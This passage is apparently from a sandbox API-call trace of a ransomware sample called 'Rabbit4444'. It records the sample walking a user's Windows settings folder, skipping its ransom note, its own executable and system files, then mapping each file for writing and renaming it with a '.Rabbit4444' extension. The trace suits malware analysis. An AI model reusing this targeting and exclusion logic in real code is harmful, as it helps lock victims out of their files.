(lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfastkeyentryenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.029] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.029] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14833972848) returned 1 [0057.029] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1371) returned 1 [0057.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.029] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102150 [0057.029] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x298 [0057.031] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x70000 [0057.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.032] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1098e8 [0057.032] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1098e8 | out: hHeap=0xe0000) returned 1 [0057.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.033] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14834345774) returned 1 [0057.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.033] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102150 | out: hHeap=0xe0000) returned 1 [0057.033] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.033] CloseHandle (hObject=0x298) returned 1 [0057.033] CloseHandle (hObject=0x278) returned 1 [0057.033] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms.Rabbit4444") returned 209 [0057.033] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfastkeyentryenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFastKeyEntryEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfastkeyentryenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.034] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d300636, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1d300636, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239b6099, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x56a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", cAlternateFileName="AA4EF2~1.SET")) returned 1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.034] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.034] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms" [0057.034] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.040] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms") returned 84 [0057.040] lstrlenW (lpString="Rabbit4444") returned 10 [0057.040] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.040] lstrlenW (lpString=".dll") returned 4 [0057.040] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.041] lstrlenW (lpString=".lnk") returned 4 [0057.041] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.041] lstrlenW (lpString=".ini") returned 4 [0057.041] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.041] lstrlenW (lpString=".sys") returned 4 [0057.041] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.041] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfollowinsertionenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.041] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.041] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14835172018) returned 1 [0057.041] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1386) returned 1 [0057.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117b30 [0057.041] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0057.041] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x870, lpName=0x0) returned 0x298 [0057.042] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x870) returned 0x70000 [0057.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0057.043] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0057.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.043] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.043] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14835426526) returned 1 [0057.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117b30 | out: hHeap=0xe0000) returned 1 [0057.044] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0057.044] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.044] CloseHandle (hObject=0x298) returned 1 [0057.044] CloseHandle (hObject=0x278) returned 1 [0057.044] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms.Rabbit4444") returned 212 [0057.044] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfollowinsertionenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsFollowInsertionEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isfollowinsertionenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.045] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d5166c6, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1d5166c6, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x239dc2f0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x56a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", cAlternateFileName="AAB22F~1.SET")) returned 1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.045] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.045] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms" [0057.045] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.045] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms") returned 84 [0057.045] lstrlenW (lpString="Rabbit4444") returned 10 [0057.045] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.046] lstrlenW (lpString=".dll") returned 4 [0057.046] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.046] lstrlenW (lpString=".lnk") returned 4 [0057.046] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.046] lstrlenW (lpString=".ini") returned 4 [0057.046] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.046] lstrlenW (lpString=".sys") returned 4 [0057.046] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.046] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_ishighlightcursorenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.046] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.046] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14835676171) returned 1 [0057.046] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1386) returned 1 [0057.046] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0057.046] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102260 [0057.046] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x870, lpName=0x0) returned 0x298 [0057.047] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x870) returned 0x70000 [0057.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0057.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0057.048] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0057.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.048] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.049] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14835929247) returned 1 [0057.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117680 | out: hHeap=0xe0000) returned 1 [0057.049] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102260 | out: hHeap=0xe0000) returned 1 [0057.049] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.049] CloseHandle (hObject=0x298) returned 1 [0057.049] CloseHandle (hObject=0x278) returned 1 [0057.049] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms.Rabbit4444") returned 212 [0057.049] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_ishighlightcursorenabled.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsHighlightCursorEnabled.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_ishighlightcursorenabled.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.050] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1d9db264, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x1d9db264, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x233e650b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x55f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", cAlternateFileName="AA0FB5~1.SET")) returned 1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2=".") returned 1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="..") returned 1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="windows") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="boot") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.050] lstrcmpiW (lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.050] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms") returned="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms" [0057.050] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.051] lstrlenW (lpString="AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms") returned 82 [0057.051] lstrlenW (lpString="Rabbit4444") returned 10 [0057.051] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.051] lstrlenW (lpString=".dll") returned 4 [0057.051] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.051] lstrlenW (lpString=".lnk") returned 4 [0057.051] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.051] lstrlenW (lpString=".ini") returned 4 [0057.051] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.051] lstrlenW (lpString=".sys") returned 4 [0057.051] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.051] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_accessibility_narrator_isplayaudiocuesenabled.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.051] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.051] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14836194358) returned 1 [0057.051] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1375) returned 1 [0057.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1177e8 [0057.051] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101380 [0057.051] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x860, lpName=0x0) returned 0x298 [0057.052] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x860) returned 0x70000 [0057.053] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.053] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.053] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.053] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.053] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.054] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14836444926) returned 1 [0057.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1177e8 | out: hHeap=0xe0000) returned 1 [0057.054] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101380 | out: hHeap=0xe0000) returned 1 [0057.054] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.054] CloseHandle (hObject=0x298) returned 1 [0057.054] CloseHandle (hObject=0x278) returned 1 [0057.054] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Accessibility_Narrator_IsPlayAudioCuesEnabled.settingcontent-ms.Rabbit4444") returned 210 [0057.054] MoveFileExW 